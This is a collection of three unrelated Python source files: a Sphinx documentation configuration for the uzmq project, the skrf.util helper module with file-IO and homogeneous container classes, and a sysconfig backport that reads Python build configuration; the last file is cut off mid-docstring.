sys.path.append(os.path.join(CURDIR, '.'))
import uzmq
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'uzmq'
copyright = '2012, Author'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "%s.%s" % (uzmq.version_info[0], uzmq.version_info[1])
# The full version, including alpha/beta/rc tags.
release = ''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'uzmqdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'uzmq.tex', 'uzmq Documentation',
'Author', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'uzmq', 'uzmq Documentation',
['Author'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'uzmq', 'uzmq Documentation',
'Author', 'uzmq', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = 'uzmq'
epub_author = 'Author'
epub_publisher = 'Author'
epub_copyright = '2012, Author'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
| |
'''
.. currentmodule:: skrf.util
========================================
util (:mod:`skrf.util`)
========================================
Holds utility functions that are general conveniences.
General
------------
.. autosummary::
:toctree: generated/
now_string
find_nearest
find_nearest_index
get_fid
get_extn
'''
from . import mathFunctions as mf
import matplotlib as mpl
import warnings
import os, fnmatch
try:
import cPickle as pickle
except ImportError:
import pickle as pickle
import pylab as plb
import numpy as npy
from scipy.constants import mil
from datetime import datetime
import collections, pprint
from subprocess import Popen,PIPE
# globals
try:
basestring
except NameError:
basestring = (str, bytes)
# other
def now_string():
'''
returns a unique sortable string, representing the current time
nice for generating date-time stamps to be used in file-names,
the companion function :func:`now_string_2_dt` can be used
to read these string back into datetime objects.
See Also
------------
now_string_2_dt
'''
return datetime.now().__str__().replace('-','.').replace(':','.').replace(' ','.')
def now_string_2_dt(s):
'''
Converts the output of :func:`now_string` to a datetime object.
See Also
-----------
now_string
'''
return datetime(*[int(k) for k in s.split('.')])
def find_nearest(array,value):
'''
find nearest value in array.
taken from http://stackoverflow.com/questions/2566412/find-nearest-value-in-numpy-array
Parameters
----------
array : numpy.ndarray
array we are searching for a value in
value : element of the array
value to search for
Returns
--------
found_value : an element of the array
the value that is numerically closest to `value`
'''
idx=(npy.abs(array-value)).argmin()
return array[idx]
def find_nearest_index(array,value):
'''
find nearest value in array.
Parameters
----------
array : numpy.ndarray
array we are searching for a value in
value : element of the array
value to search for
Returns
--------
found_index : int
the index at which the numerically closest element to `value`
was found at
taken from http://stackoverflow.com/questions/2566412/find-nearest-value-in-numpy-array
'''
return (npy.abs(array-value)).argmin()
def slice_domain(x,domain):
'''
Returns a slice object closest to the `domain` of `x`
domain = x[slice_domain(x, (start, stop))]
Parameters
-----------
vector : array-like
an array of values
domain : tuple
tuple of (start,stop) values defining the domain over
which to slice
Examples
-----------
>>> x = linspace(0,10,101)
>>> idx = slice_domain(x, (2,6))
>>> x[idx]
'''
start = find_nearest_index(x, domain[0])
stop = find_nearest_index(x, domain[1])
return slice(start,stop+1)
# file IO
def get_fid(file, *args, **kwargs):
'''
Returns a file object, given a filename or file object
Useful when you want to allow the arguments of a function to
be either files or filenames
Parameters
-------------
file : str/unicode or file-object
file to open
\*args, \*\*kwargs : arguments and keyword arguments to `open()`
'''
if isinstance(file, basestring):
return open(file, *args, **kwargs)
else:
return file
def get_extn(filename):
'''
Get the extension from a filename.
The extension is defined as everything passed the last '.'.
Returns None if it ain't got one
Parameters
------------
filename : string
the filename
Returns
--------
ext : string, None
either the extension (not including '.') or None if there
isn't one
'''
ext = os.path.splitext(filename)[-1]
if len(ext)==0:
return None
else:
return ext[1:]
def basename_noext(filename):
'''
gets the basename and strips extension
'''
return os.path.splitext(os.path.basename(filename))[0]
# git
def git_version( modname):
'''
Returns output 'git describe', executed in a module's root directory.
'''
mod = __import__(modname)
mod_dir =os.path.split(mod.__file__)[0]
p = Popen(['git', 'describe'], stdout = PIPE,stderr=PIPE, cwd =mod_dir )
try:
out,er = p.communicate()
except(OSError):
return None
out = out.strip('\n')
if out == '':
return None
return out
def stylely(rc_dict={}, style_file = 'skrf.mplstyle'):
'''
loads the rc-params from the specified file (file must be located in skrf/data)
'''
from skrf.data import pwd # delayed to solve circular import
rc = mpl.rc_params_from_file(os.path.join(pwd, style_file))
mpl.rcParams.update(rc)
mpl.rcParams.update(rc_dict)
def dict_2_recarray(d, delim, dtype):
'''
Turns a dictionary of structured keys to a record array of objects
This is useful if you save data-base like meta-data in the form
or file-naming conventions, aka 'the poor-mans database'
Examples
-------------
given a directory of networks like:
>>> ls
a1,0.0,0.0.s1p a1,3.0,3.0.s1p a2,3.0,-3.0.s1p b1,-3.0,3.0.s1p
...
you can sort based on the values or each field, after defining their
type with `dtype`. The `values` field accesses the objects.
>>>d =rf.ran('/tmp/' )
>>>delim =','
>>>dtype = [('name', object),('voltage',float),('current',float)]
>>>ra = dict_2_recarray(d=rf.ran(dir), delim=delim, dtype =dtype)
then you can sift like you do with numpy arrays
>>>ra[ra['voltage']<3]['values']
array([1-Port Network: 'a2,0.0,-3.0', 450-800 GHz, 101 pts, z0=[ 50.+0.j],
1-Port Network: 'b1,0.0,3.0', 450-800 GHz, 101 pts, z0=[ 50.+0.j],
1-Port Network: 'a1,0.0,-3.0', 450-800 GHz, 101 pts, z0=[ 50.+0.j],
'''
split_keys = [tuple(k.split(delim)+[d[k]]) for k in d.keys()]
x = npy.array(split_keys, dtype=dtype+[('values',object)])
return x
def findReplace(directory, find, replace, filePattern):
'''
Find/replace some txt in all files in a directory, recursively
This was found in [1]_.
Examples
-----------
findReplace("some_dir", "find this", "replace with this", "*.txt")
.. [1] http://stackoverflow.com/questions/4205854/python-way-to-recursively-find-and-replace-string-in-text-files
'''
for path, dirs, files in os.walk(os.path.abspath(directory)):
for filename in fnmatch.filter(files, filePattern):
filepath = os.path.join(path, filename)
with open(filepath) as f:
s = f.read()
s = s.replace(find, replace)
with open(filepath, "w") as f:
f.write(s)
# general purpose objects
class HomoList(collections.Sequence):
'''
A Homogeneous Sequence
Provides a class for a list-like object which contains
homogeneous values. Attributes of the values can be accessed through
the attributes of HomoList. Searching is done like numpy arrays.
Initialized from a list of all the same type
>>> h = HomoDict([Foo(...), Foo(...)])
The individual values of `h` can be access in identical fashion to
Lists.
>>> h[0]
Assuming that `Foo` has property `prop` and function `func` ...
Access elements' properties:
>>> h.prop
Access elements' functions:
>>> h.func()
Searching:
>>> h[h.prop == value]
>>> h[h.prop < value]
Multiple search:
>>> h[set(h.prop==value1) & set( h.prop2==value2)]
Combos:
>>> h[h.prop==value].func()
'''
def __init__(self, list_):
self.store = list(list_)
def __eq__(self, value):
return [k for k in range(len(self)) if self.store[k] == value ]
def __ne__(self, value):
return [k for k in range(len(self)) if self.store[k] != value ]
def __gt__(self, value):
return [k for k in range(len(self)) if self.store[k] > value ]
def __ge__(self, value):
return [k for k in range(len(self)) if self.store[k] >= value ]
def __lt__(self, value):
return [k for k in range(len(self)) if self.store[k] < value ]
def __le__(self, value):
return [k for k in range(len(self)) if self.store[k] <= value ]
def __getattr__(self, name):
return self.__class__(
[k.__getattribute__(name) for k in self.store])
def __getitem__(self, idx):
try:
return self.store[idx]
except(TypeError):
return self.__class__([self.store[k] for k in idx])
def __call__(self, *args, **kwargs):
return self.__class__(
[k(*args,**kwargs) for k in self.store])
def __setitem__(self, idx, value):
self.store[idx] = value
def __delitem__(self, idx):
del self.store[idx]
def __iter__(self):
return iter(self.store)
def __len__(self):
return len(self.store)
def __str__(self):
return pprint.pformat(self.store)
def __repr__(self):
return pprint.pformat(self.store)
class HomoDict(collections.MutableMapping):
'''
A Homogeneous Mutable Mapping
Provides a class for a dictionary-like object which contains
homogeneous values. Attributes of the values can be accessed through
the attributes of HomoDict. Searching is done like numpy arrays.
Initialized from a dictionary containing values of all the same type
>>> h = HomoDict({'a':Foo(...),'b': Foo(...), 'c':Foo(..)})
The individual values of `h` can be access in identical fashion to
Dictionaries.
>>> h['key']
Assuming that `Foo` has property `prop` and function `func` ...
Access elements' properties:
>>> h.prop
Access elements' functions:
>>> h.func()
Searching:
>>> h[h.prop == value]
>>> h[h.prop < value]
Multiple search:
>>> h[set(h.prop==value1) & set( h.prop2==value2)]
Combos:
>>> h[h.prop==value].func()
'''
def __init__(self, dict_):
self.store = dict(dict_)
def __eq__(self, value):
return [k for k in self.store if self.store[k] == value ]
def __ne__(self, value):
return [k for k in self.store if self.store[k] != value ]
def __gt__(self, value):
return [k for k in self.store if self.store[k] > value ]
def __ge__(self, value):
return [k for k in self.store if self.store[k] >= value ]
def __lt__(self, value):
return [k for k in self.store if self.store[k] < value ]
def __le__(self, value):
return [k for k in self.store if self.store[k] <= value ]
def __getattr__(self, name):
return self.__class__(
{k: getattr(self.store[k],name) for k in self.store})
def __getitem__(self, key):
if isinstance(key, str):
return self.store[key]
else:
c = self.__class__({k:self.store[k] for k in key})
return c
#if len(c) == 1:
# return c.store.values()[0]
#else:
# return c
def __call__(self, *args, **kwargs):
return self.__class__(
{k: self.store[k](*args, **kwargs) for k in self.store})
def __setitem__(self, key, value):
self.store[key] = value
def __delitem__(self, key):
del self.store[key]
def __iter__(self):
return iter(self.store)
def __len__(self):
return len(self.store)
def __str__(self):
return pprint.pformat(self.store)
def __repr__(self):
return pprint.pformat(self.store)
def copy(self):
return HomoDict(self.store)
def filter_nones(self):
self.store = {k:self.store[k] for k in self.store \
if self.store[k] is not None}
def filter(self, **kwargs):
'''
Filter self based on kwargs
This is equivalent to:
>>> h = HomoDict(...)
>>> for k in kwargs:
>>> h = h[k ==kwargs[k]]
>>> return h
prefixing the kwarg value with a '!' causes a not equal test (!=)
Examples
----------
>>> h = HomoDict(...)
>>> h.filter(name='jean', age = '18', gender ='!female')
'''
a = self
for k in kwargs:
if kwargs[k][0] == '!':
a = a[a.__getattr__(k) != kwargs[k][1:]]
else:
a = a[a.__getattr__(k) == kwargs[k]]
return a
| |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""Access to Python's configuration information."""
import codecs
import os
import re
import sys
from os.path import pardir, realpath
try:
import configparser
except ImportError:
import ConfigParser as configparser
__all__ = [
'get_config_h_filename',
'get_config_var',
'get_config_vars',
'get_makefile_filename',
'get_path',
'get_path_names',
'get_paths',
'get_platform',
'get_python_version',
'get_scheme_names',
'parse_config_h',
]
def _safe_realpath(path):
try:
return realpath(path)
except OSError:
return path
if sys.executable:
_PROJECT_BASE = os.path.dirname(_safe_realpath(sys.executable))
else:
# sys.executable can be empty if argv[0] has been changed and Python is
# unable to retrieve the real program name
_PROJECT_BASE = _safe_realpath(os.getcwd())
if os.name == "nt" and "pcbuild" in _PROJECT_BASE[-8:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir))
# PC/VS7.1
if os.name == "nt" and "\\pc\\v" in _PROJECT_BASE[-10:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
# PC/AMD64
if os.name == "nt" and "\\pcbuild\\amd64" in _PROJECT_BASE[-14:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
def is_python_build():
for fn in ("Setup.dist", "Setup.local"):
if os.path.isfile(os.path.join(_PROJECT_BASE, "Modules", fn)):
return True
return False
_PYTHON_BUILD = is_python_build()
_cfg_read = False
def _ensure_cfg_read():
global _cfg_read
if not _cfg_read:
from ..resources import finder
backport_package = __name__.rsplit('.', 1)[0]
_finder = finder(backport_package)
_cfgfile = _finder.find('sysconfig.cfg')
assert _cfgfile, 'sysconfig.cfg exists'
with _cfgfile.as_stream() as s:
_SCHEMES.readfp(s)
if _PYTHON_BUILD:
for scheme in ('posix_prefix', 'posix_home'):
_SCHEMES.set(scheme, 'include', '{srcdir}/Include')
_SCHEMES.set(scheme, 'platinclude', '{projectbase}/.')
_cfg_read = True
_SCHEMES = configparser.RawConfigParser()
_VAR_REPL = re.compile(r'\{([^{]*?)\}')
def _expand_globals(config):
_ensure_cfg_read()
if config.has_section('globals'):
globals = config.items('globals')
else:
globals = tuple()
sections = config.sections()
for section in sections:
if section == 'globals':
continue
for option, value in globals:
if config.has_option(section, option):
continue
config.set(section, option, value)
config.remove_section('globals')
# now expanding local variables defined in the cfg file
#
for section in config.sections():
variables = dict(config.items(section))
def _replacer(matchobj):
name = matchobj.group(1)
if name in variables:
return variables[name]
return matchobj.group(0)
for option, value in config.items(section):
config.set(section, option, _VAR_REPL.sub(_replacer, value))
#_expand_globals(_SCHEMES)
# FIXME don't rely on sys.version here, its format is an implementation detail
# of CPython, use sys.version_info or sys.hexversion
_PY_VERSION = sys.version.split()[0]
_PY_VERSION_SHORT = sys.version[:3]
_PY_VERSION_SHORT_NO_DOT = _PY_VERSION[0] + _PY_VERSION[2]
_PREFIX = os.path.normpath(sys.prefix)
_EXEC_PREFIX = os.path.normpath(sys.exec_prefix)
_CONFIG_VARS = None
_USER_BASE = None
def _subst_vars(path, local_vars):
"""In the string `path`, replace tokens like {some.thing} with the
corresponding value from the map `local_vars`.
If there is no corresponding value, leave the token unchanged.
"""
def _replacer(matchobj):
name = matchobj.group(1)
if name in local_vars:
return local_vars[name]
elif name in os.environ:
return os.environ[name]
return matchobj.group(0)
return _VAR_REPL.sub(_replacer, path)
def _extend_dict(target_dict, other_dict):
target_keys = target_dict.keys()
for key, value in other_dict.items():
if key in target_keys:
continue
target_dict[key] = value
def _expand_vars(scheme, vars):
res = {}
if vars is None:
vars = {}
_extend_dict(vars, get_config_vars())
for key, value in _SCHEMES.items(scheme):
if os.name in ('posix', 'nt'):
value = os.path.expanduser(value)
res[key] = os.path.normpath(_subst_vars(value, vars))
return res
def format_value(value, vars):
def _replacer(matchobj):
name = matchobj.group(1)
if name in vars:
return vars[name]
return matchobj.group(0)
return _VAR_REPL.sub(_replacer, value)
def _get_default_scheme():
if os.name == 'posix':
# the default scheme for posix is posix_prefix
return 'posix_prefix'
return os.name
def _getuserbase():
env_base = os.environ.get("PYTHONUSERBASE", None)
def joinuser(*args):
return os.path.expanduser(os.path.join(*args))
# what about 'os2emx', 'riscos' ?
if os.name == "nt":
base = os.environ.get("APPDATA") or "~"
if env_base:
return env_base
else:
return joinuser(base, "Python")
if sys.platform == "darwin":
framework = get_config_var("PYTHONFRAMEWORK")
if framework:
if env_base:
return env_base
else:
return joinuser("~", "Library", framework, "%d.%d" %
sys.version_info[:2])
if env_base:
return env_base
else:
return joinuser("~", ".local")
def _parse_makefile(filename, vars=None):
"""Parse a Makefile-style file.
A dictionary containing name/value pairs is returned. If an
optional dictionary is passed in as the second argument, it is
used instead of a new dictionary.
"""
# Regexes needed for parsing Makefile (and similar syntaxes,
# like old-style Setup files).
_variable_rx = re.compile("([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)")
_findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)")
_findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}")
if vars is None:
vars = {}
done = {}
notdone = {}
with codecs.open(filename, encoding='utf-8', errors="surrogateescape") as f:
lines = f.readlines()
for line in lines:
if line.startswith('#') or line.strip() == '':
continue
m = _variable_rx.match(line)
if m:
n, v = m.group(1, 2)
v = v.strip()
# `$$' is a literal `$' in make
tmpv = v.replace('$$', '')
if "$" in tmpv:
notdone[n] = v
else:
try:
v = int(v)
except ValueError:
# insert literal `$'
done[n] = v.replace('$$', '$')
else:
done[n] = v
# do variable interpolation here
variables = list(notdone.keys())
# Variables with a 'PY_' prefix in the makefile. These need to
# be made available without that prefix through sysconfig.
# Special care is needed to ensure that variable expansion works, even
# if the expansion uses the name without a prefix.
renamed_variables = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS')
while len(variables) > 0:
for name in tuple(variables):
value = notdone[name]
m = _findvar1_rx.search(value) or _findvar2_rx.search(value)
if m is not None:
n = m.group(1)
found = True
if n in done:
item = str(done[n])
elif n in notdone:
# get it on a subsequent round
found = False
elif n in os.environ:
# do it like make: fall back to environment
item = os.environ[n]
elif n in renamed_variables:
if (name.startswith('PY_') and
name[3:] in renamed_variables):
item = ""
elif 'PY_' + n in notdone:
found = False
else:
item = str(done['PY_' + n])
else:
done[n] = item = ""
if found:
after = value[m.end():]
value = value[:m.start()] + item + after
if "$" in after:
notdone[name] = value
else:
try:
value = int(value)
except ValueError:
done[name] = value.strip()
else:
done[name] = value
variables.remove(name)
if (name.startswith('PY_') and
name[3:] in renamed_variables):
name = name[3:]
if name not in done:
done[name] = value
else:
# bogus variable reference (e.g. "prefix=$/opt/python");
# just drop it since we can't deal
done[name] = value
variables.remove(name)
# strip spurious spaces
for k, v in done.items():
if isinstance(v, str):
done[k] = v.strip()
# save the results in the global dictionary
vars.update(done)
return vars
def get_makefile_filename():
"""Return the path of the Makefile."""
if _PYTHON_BUILD:
return os.path.join(_PROJECT_BASE, "Makefile")
if hasattr(sys, 'abiflags'):
config_dir_name = 'config-%s%s' % (_PY_VERSION_SHORT, sys.abiflags)
else:
config_dir_name = 'config'
return os.path.join(get_path('stdlib'), config_dir_name, 'Makefile')
def _init_posix(vars):
"""Initialize the module as appropriate for POSIX systems."""
# load the installed Makefile:
makefile = get_makefile_filename()
try:
_parse_makefile(makefile, vars)
except IOError as e:
msg = "invalid Python installation: unable to open %s" % makefile
if hasattr(e, "strerror"):
msg = msg + " (%s)" % e.strerror
raise IOError(msg)
# load the installed pyconfig.h:
config_h = get_config_h_filename()
try:
with open(config_h) as f:
parse_config_h(f, vars)
except IOError as e:
msg = "invalid Python installation: unable to open %s" % config_h
if hasattr(e, "strerror"):
msg = msg + " (%s)" % e.strerror
raise IOError(msg)
# On AIX, there are wrong paths to the linker scripts in the Makefile
# -- these paths are relative to the Python source, but when installed
# the scripts are in another directory.
if _PYTHON_BUILD:
vars['LDSHARED'] = vars['BLDSHARED']
def _init_non_posix(vars):
"""Initialize the module as appropriate for NT"""
# set basic install directories
vars['LIBDEST'] = get_path('stdlib')
vars['BINLIBDEST'] = get_path('platstdlib')
vars['INCLUDEPY'] = get_path('include')
vars['SO'] = '.pyd'
vars['EXE'] = '.exe'
vars['VERSION'] = _PY_VERSION_SHORT_NO_DOT
vars['BINDIR'] = os.path.dirname(_safe_realpath(sys.executable))
#
# public APIs
#
def parse_config_h(fp, vars=None):
"""Parse a config.h-style file.
A dictionary containing name/value pairs is returned. If an
optional dictionary is passed in as the second argument, it is
used instead of a new dictionary.
"""
if vars is None:
vars = {}
define_rx = re.compile("#define ([A-Z][A-Za-z0-9_]+) (.*)\n")
undef_rx = re.compile("/[*] #undef ([A-Z][A-Za-z0-9_]+) [*]/\n")
while True:
line = fp.readline()
if not line:
break
m = define_rx.match(line)
if m:
n, v = m.group(1, 2)
try:
v = int(v)
except ValueError:
pass
vars[n] = v
else:
m = undef_rx.match(line)
if m:
vars[m.group(1)] = 0
return vars
def get_config_h_filename():
"""Return the path of pyconfig.h."""
if _PYTHON_BUILD:
if os.name == "nt":
inc_dir = os.path.join(_PROJECT_BASE, "PC")
else:
inc_dir = _PROJECT_BASE
else:
inc_dir = get_path('platinclude')
return os.path.join(inc_dir, 'pyconfig.h')
def get_scheme_names():
"""Return a tuple containing the schemes names."""
return tuple(sorted(_SCHEMES.sections()))
def get_path_names():
"""Return a tuple containing the paths names."""
# xxx see if we want a static list
return _SCHEMES.options('posix_prefix')
def get_paths(scheme=_get_default_scheme(), vars=None, expand=True):
"""Return a mapping containing an install scheme.
``scheme`` is the install scheme name. If not provided, it will
return the default scheme for the current platform.
"""
_ensure_cfg_read()
if expand:
return _expand_vars(scheme, vars)
else:
return dict(_SCHEMES.items(scheme))
def get_path(name, scheme=_get_default_scheme(), vars=None, expand=True):
"""Return a path corresponding to the scheme.
``scheme`` is the install scheme name.
"""
return get_paths(scheme, vars, expand)[name]
def get_config_vars(*args):
"""With no arguments, return a dictionary of all configuration
variables relevant for the current platform.
On Unix, this means every variable defined in Python's installed Makefile;
On Windows and Mac OS it's a much smaller set.
With arguments, return a list of values that result from looking up
each argument in the configuration variable dictionary.
"""
global _CONFIG_VARS
if _CONFIG_VARS is None:
_CONFIG_VARS = {}
# Normalized versions of prefix and exec_prefix are handy to have;
# in fact, these are the standard versions used most places in the
# distutils2 module.
_CONFIG_VARS['prefix'] = _PREFIX
_CONFIG_VARS['exec_prefix'] = _EXEC_PREFIX
_CONFIG_VARS['py_version'] = _PY_VERSION
_CONFIG_VARS['py_version_short'] = _PY_VERSION_SHORT
_CONFIG_VARS['py_version_nodot'] = _PY_VERSION[0] + _PY_VERSION[2]
_CONFIG_VARS['base'] = _PREFIX
_CONFIG_VARS['platbase'] = _EXEC_PREFIX
_CONFIG_VARS['projectbase'] = _PROJECT_BASE
try:
_CONFIG_VARS['abiflags'] = sys.abiflags
except AttributeError:
# sys.abiflags may not be defined on all platforms.
_CONFIG_VARS['abiflags'] = ''
if os.name in ('nt', 'os2'):
_init_non_posix(_CONFIG_VARS)
if os.name == 'posix':
_init_posix(_CONFIG_VARS)
# Setting 'userbase' is done below the call to the
# init function to enable using 'get_config_var' in
# the init-function.
if sys.version >= '2.6':
_CONFIG_VARS['userbase'] = _getuserbase()
if 'srcdir' not in _CONFIG_VARS:
_CONFIG_VARS['srcdir'] = _PROJECT_BASE
else:
_CONFIG_VARS['srcdir'] = _safe_realpath(_CONFIG_VARS['srcdir'])
# Convert srcdir into an absolute path if it appears necessary.
# Normally it is relative to the build directory. However, during
# testing, for example, we might be running a non-installed python
# from a different directory.
if _PYTHON_BUILD and os.name == "posix":
base = _PROJECT_BASE
try:
cwd = os.getcwd()
except OSError:
cwd = None
if (not os.path.isabs(_CONFIG_VARS['srcdir']) and
base != cwd):
# srcdir is relative and we are not in the same directory
# as the executable. Assume executable is in the build
# directory and make srcdir absolute.
srcdir = os.path.join(base, _CONFIG_VARS['srcdir'])
_CONFIG_VARS['srcdir'] = os.path.normpath(srcdir)
if sys.platform == 'darwin':
kernel_version = os.uname()[2] # Kernel version (8.4.3)
major_version = int(kernel_version.split('.')[0])
if major_version < 8:
# On macOS before 10.4, check if -arch and -isysroot
# are in CFLAGS or LDFLAGS and remove them if they are.
# This is needed when building extensions on a 10.3 system
# using a universal build of python.
for key in ('LDFLAGS', 'BASECFLAGS',
# a number of derived variables. These need to be
# patched up as well.
'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'):
flags = _CONFIG_VARS[key]
flags = re.sub('-arch\s+\w+\s', ' ', flags)
flags = re.sub('-isysroot [^ \t]*', ' ', flags)
_CONFIG_VARS[key] = flags
else:
# Allow the user to override the architecture flags using
# an environment variable.
# NOTE: This name was introduced by Apple in OSX 10.5 and
# is used by several scripting languages distributed with
# that OS release.
if 'ARCHFLAGS' in os.environ:
arch = os.environ['ARCHFLAGS']
for key in ('LDFLAGS', 'BASECFLAGS',
# a number of derived variables. These need to be
# patched up as well.
'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'):
flags = _CONFIG_VARS[key]
flags = re.sub('-arch\s+\w+\s', ' ', flags)
flags = flags + ' ' + arch
_CONFIG_VARS[key] = flags
# If we're on OSX 10.5 or later and the user tries to
# compiles an extension using an SDK that is not present
# on the current machine it is better to not use an SDK
# than to fail.
#
# The major usecase for this is users using a Python.org
# binary installer on OSX 10.6: that installer uses
# the 10.4u SDK, but that SDK is not installed by default
# when you install Xcode.
#
CFLAGS = _CONFIG_VARS.get('CFLAGS', '')
m = re.search('-isysroot\s+(\S+)', CFLAGS)
if m is not None:
sdk = m.group(1)
if not os.path.exists(sdk):
for key in ('LDFLAGS', 'BASECFLAGS',
# a number of derived variables. These need to be
# patched up as well.
'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'):
flags = _CONFIG_VARS[key]
flags = re.sub('-isysroot\s+\S+(\s|$)', ' ', flags)
_CONFIG_VARS[key] = flags
if args:
vals = []
for name in args:
vals.append(_CONFIG_VARS.get(name))
return vals
else:
return _CONFIG_VARS
def get_config_var(name):
"""Return the value of a single variable using the dictionary returned by
'get_config_vars()'.
Equivalent to get_config_vars().get(name)
"""
return get_config_vars().get(name)
def get_platform():
"""Return a string that identifies the current platform.
This is used mainly to distinguish platform-specific build directories and
platform-specific built distributions. Typically includes the OS name
and version and the architecture (as supplied by 'os.uname()'),
although the exact information included depends on the OS; eg. for IRIX
the architecture isn't particularly important (IRIX only runs on SGI
hardware), but for Linux the kernel version isn't particularly
important.
Examples of returned values:
linux-i586
linux-alpha (?)
solaris-2.6-sun4u
irix-5.3
irix64-6.2
Windows will return one of:
